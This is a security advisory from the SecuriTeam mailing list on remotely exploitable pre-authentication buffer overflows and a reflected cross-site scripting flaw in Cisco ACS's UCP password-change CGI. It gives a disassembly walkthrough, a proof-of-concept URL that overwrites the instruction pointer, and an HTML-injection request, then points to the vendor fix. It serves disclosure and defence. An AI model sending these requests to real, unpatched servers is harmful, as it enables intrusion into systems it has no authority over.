[NT] Cisco ACS UCP Pre-Authentication Buffer Overflows

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Cisco ACS UCP Pre-Authentication Buffer Overflows
------------------------------------------------------------------------


SUMMARY

Cisco Secure Access Control Server (ACS) for Windows User-Changeable
Password (UCP) application is a set of CGI programs and web site contents
installed on Microsoft IIS.

From the Cisco Advisory:
"The UCP application enables end users to change their ACS passwords with
a web-based utility. When users need to change their own passwords, they
can access the UCP web page by using a supported web browser, validate
their existing credentials, and then change their password via the
utility."

The CGI /securecgi-bin/CSUserCGI.exe suffers from multiple buffer
overflows exploitable remotely through the HTTP protocol before
authentication. Additionally, CSUserCGI.exe suffers from a non-persistent
Cross Site Scripting vulnerability.

DETAILS

Vulnerable Systems:
* Cisco ACS version 3 and version 4
* Cisco UCP version 3.3.4.12.5
* Cisco CSuserCGI version 3.3.1

Immune Systems:
* Cisco ACS UCP version 4.2

The main() function of CSuserCGI.exe compares the first command line
argument passed to the program using strcmp() against a list of supported
arguments, among them "Logout", "Main", "ChangePass", etc.

For most of the aguments, it will simply parse the following arguments and
pass them to a wsprintf() call with format strings like
"Action=%s&Username=%s&OldPass=%s&NetPass=%s". The destination buffer of
these calls is located in the .data segment of the application.

In case of the "Logout" argument, main() passes the second argument,
usually of the form "1234.xyzab.c.username.", as well as a char[] buffer
on the stack to a function that first extracts the string up to the first
'.' character using strtok and then copies the string into the supplied
char[] buffer. The char buffer is 96 bytes long. Accordingly, if the
string before the first dot character exceeds this length, the buffer as
well as the return address is overwritten.

.text:00401065 mov eax, [ebx+8] ; get argv[2]
.text:00401068 test eax, eax
.text:0040106A jz loc_401520
.text:00401070 push eax ; char *
.text:00401071 call sub_402870
...
.text:00402870 sub esp, 60h
.text:00402873 mov ecx, 17h
.text:00402878 xor eax, eax
.text:0040287A push edi
.text:0040287B lea edi, [esp+64h+var_60]
.text:0040287F rep stosd
.text:00402881 mov ecx, [esp+64h+arg_0]
.text:00402885 stosw
.text:00402887 stosb
.text:00402888 lea eax, [esp+64h+var_60]
.text:0040288C push eax ; int
.text:0040288D push ecx ; char *
.text:0040288E call sub_402940
...
.text:00402940 mov ecx, [esp+arg_0]
.text:00402944 xor eax, eax
.text:00402946 test ecx, ecx
.text:00402948 jz locret_402A11
.text:0040294E push ebx
.text:0040294F push esi
.text:00402950 push edi
.text:00402951 push offset a_ ; "."
.text:00402956 push ecx ; char *
.text:00402957 call _strtok
.text:0040295C mov edi, eax
.text:0040295E or ecx, 0FFFFFFFFh
.text:00402961 xor eax, eax
.text:00402963 mov ebx, [esp+14h+arg_4]
.text:00402967 repne scasb
.text:00402969 not ecx
.text:0040296B sub edi, ecx
.text:0040296D lea edx, [ebx+1]
.text:00402970 mov eax, ecx
.text:00402972 mov esi, edi
.text:00402974 mov edi, edx
.text:00402976 push offset a_ ; "."
.text:0040297B shr ecx, 2
.text:0040297E rep movsd
.text:00402980 mov ecx, eax
.text:00402982 push 0 ; char *
.text:00402984 and ecx, 3
.text:00402987 rep movsb

Example:
The following request will cause EIP to be overwritten with 0x42424242.
The line may wrap, depending on how you view this file.
https://target/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.

A non-persistent Cross Site Scripting vulnerability can also be triggered
using the Help facility of the CGI. An example request would be as
follows. The line may wrap, depending on how you view this file.
https://target/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E

Solution:
Update to UCP version 4.2. See the Cisco Advisory for how to obtain fixed
software:
<http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml>
http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml


ADDITIONAL INFORMATION





========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages